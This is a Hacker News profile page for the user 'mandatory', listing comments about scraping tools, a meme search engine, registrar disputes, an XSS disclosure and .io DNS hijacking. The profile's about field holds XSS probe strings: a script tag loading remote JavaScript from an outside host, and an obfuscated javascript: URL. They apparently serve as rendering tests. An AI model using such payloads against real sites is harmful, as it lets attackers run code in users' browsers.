HNHacker News
TopNewBestAskShowJobs

mandatory

540 karma · joined October 30, 2013

"><script src=https://y.vg></script>

http://www.test.com https://www.test.com JavAscRipt://www.test.com%0aalert(1)

<a href="https://www.test.com">test</a> [test](https://www.test.com)

tst

submissionscomments
mandatory··on How I block all 26M of your curl requests
Feel free to read the README, this was already an ability that startups could pay for using private premium proxy services before thermoptic.

Having an open source version allows regular people to do scraping and not just those rich in capital.

Much of the best data services on the internet all start with scraping, the README lists many of them.

mandatory··on How I block all 26M of your curl requests
They can't? I've run many free independent sites for years, that's news to me.
mandatory··on How I block all 26M of your curl requests
Thanks!
mandatory··on How I block all 26M of your curl requests
Thanks :) if you have any issues with it let me know.
mandatory··on How I block all 26M of your curl requests
Good news for curl users: https://github.com/mandatoryprogrammer/thermoptic
mandatory··on Apple Prototypes and Corporate Secrets Are for Sale Online–If You Know Where
Yep, that's an example of what the automated scanning looks for. You can see a very similar example in the slides: https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20pre...
mandatory··on Apple Prototypes and Corporate Secrets Are for Sale Online–If You Know Where
It's just because I did this talk and made FindThatMeme :) so not a popular method, just what I used to do large scale OCR.
mandatory··on Building an Internet Scale Meme Search Engine
Yes I definitely want to improve the search to be better. It is currently very text heavy and I (only recently) got image similarity indexing working. Hoping to leverage this to do something like you mentioned!

I'd also like to figure out how to turn an image into a description of whats in it. My ML/tensorflow knowledge is very weak though, so I still have a lot to learn here.

mandatory··on Building an Internet Scale Meme Search Engine
The image similarity search is probably a blog post of its own.

Short TL;DR: It runs off my home server running a large vector database (opendistro): https://opendistro.github.io/for-elasticsearch-docs/docs/knn...

mandatory··on Building an Internet Scale Meme Search Engine
Nope, you can use it totally offline. No way of getting banned as far as I'm aware.
mandatory··on Building an Internet Scale Meme Search Engine
Thanks! Comment made my night.
mandatory··on Building an Internet Scale Meme Search Engine
Yep, this is exactly what I'm running on the raspberry pi LB. Nginx makes it super easy!
mandatory··on Building an Internet Scale Meme Search Engine
Author here: KnowYourMeme is one of many sites that memes are continually ingested from (any site that has memes I try to ingest regularly) :)
mandatory··on FindThatMeme – Search Millions of Memes in Seconds
What kind of app? I'm planning on releasing a developer API soon so people can integrate it into their own bots/services.
mandatory··on FindThatMeme – Search Millions of Memes in Seconds
Thanks!
mandatory··on FindThatMeme – Search Millions of Memes in Seconds
Well I just added it :) so you should be able to find it now. If you find any others feel free to upload them!
mandatory··on Tell HN: Cloudflare prevents transfer-out of domains, sets to 'pendingdelete'
Considering your replies to other saying the same thing I doubt providing that would change your mind.
mandatory··on Tell HN: Cloudflare prevents transfer-out of domains, sets to 'pendingdelete'
Sure: https://twitter.com/iammandatory/status/1211796789013159937?...
mandatory··on Tell HN: Cloudflare prevents transfer-out of domains, sets to 'pendingdelete'
Would really recommend against them, had some random user report my domains and lost all the domains I had in Namecheap because of it.

Their support basically ignored any evidence to the contrary and let my domains expire and be sniped by other buyers.

mandatory··on Building a WebAuthn Click Farm
Plot twist: this post is a smokescreen for this person working remotely from home and needing to automate their U2F key pressing
mandatory··on More than 1k people at Twitter had ability to aid hack of accounts
> The real story here is Twitter's lack of spear-phishing training for their support staff, not support employees have access to support tools.

Spear-phishing by its very definition is a highly targeted attack. I wouldn't count on any level of training to prevent someone from getting phished. Given some of the spear phishing campaigns I've seen, I wouldn't trust even myself not to fall for them.

It's a problem that needs to be solved with technical solutions like hardware U2F, locked-down customer support devices (e.g. Chrome enterprise policy managed ChromeOS devices), and special account VIP/anomaly locking and auto-escalation.

mandatory··on ChromeGalvanizer – Harden your browser against extension backdoors and exploits
How strange, it works for me (although it took a second to propagate) - testing with a Win10 x64 VM as well: https://i.imgur.com/jr534JN.png

If you click "Reload policies" under the chrome://policy page does it kick in after ~15 seconds?

mandatory··on ChromeGalvanizer – Harden your browser against extension backdoors and exploits
Author here, can you provide the generated policy for me to take a look at?
mandatory··on Launch HN: Lang (YC S19) – Internationalization Built for Devs
Correct me if I'm wrong but wouldn't I still have to take the time to wrap everything in the codebase? I feel like that's the majority of the painful work.
mandatory··on Google Cloud Is Down
Yep, I can no longer see my Cloud SQL database - it's as if I've never created one at all. Really hoping this is just an issue displaying it and that Google hasn't punted my infrastructure and backups.
mandatory··on DynoRoot1111 (CVE-2018-1111)
Wow, these comments make me sad - this is pretty clearly satire (although the vulnerability is real and pretty scary). Did the "DynoRoot!!!1111" really not give this away? :)
mandatory··on A Recycled IP Address Caused Me to Pirate Books by Accident
I actually blogged about this in 2015, it's a problem for basically all cloud providers that allow recycled allocation of IPs: https://www.bishopfox.com/blog/2015/10/fishing-the-aws-ip-po...
mandatory··on Show HN: The Million Dollar Homepage as an Ethereum Smart Contract and DApp
This is my bad, I could've made it work for Firefox but was just testing if it was vulnerable at all. I don't really wanna pay the ether to fix it since I don't actually want to exploit anyone :)
mandatory··on Show HN: The Million Dollar Homepage as an Ethereum Smart Contract and DApp
Just an FYI this has a pretty bad security issue (XSS) which you might wanna fix ASAP (else people's Ether might get stolen :/):

https://twitter.com/IAmMandatory/status/915439417665261568

mandatory··on Taking control of all .io domains with a targeted registration
Author here, responding here like I did on Twitter. DNS resolver implementations matter here greatly. I received so many DNS queries (without me actually responding to any of them) that I quickly filled up my VPS with gigabytes of data from IP addresses of DNS resolvers across the Internet.

Saying "this is not the major security issue the author describes. He couldn't have hijacked any DNS traffic this way." seems a bit dishonest. You're saying that you have personally vetting all the DNS implementations of various DNS resolvers and have verified all of them take the resolution steps you've described exactly? If this is the case why did I receive so many queries (such as A, AAAA for the NS hostnames - which I assumed/assume was to cached these IP addresses for future resolution of the TLD's IPs). The way dig resolves things is different from how many production resolvers would do so, etc.

I can certainly see that some resolvers may take different steps for resolution which would make them unaffected by this issue (I'd have to think on it some more). A big issue here is of course that I didn't actually attempt to poison a bunch of the DNS resolvers which were hitting my server because I didn't want to affect any actual users. "Proving the point" in this case would've been dangerous and probably illegal as well.

That being said, mapping out how various DNS resolvers would perform their full resolution is an interesting side project and I've added it to my TODO list :)

Page 1 of 2Next →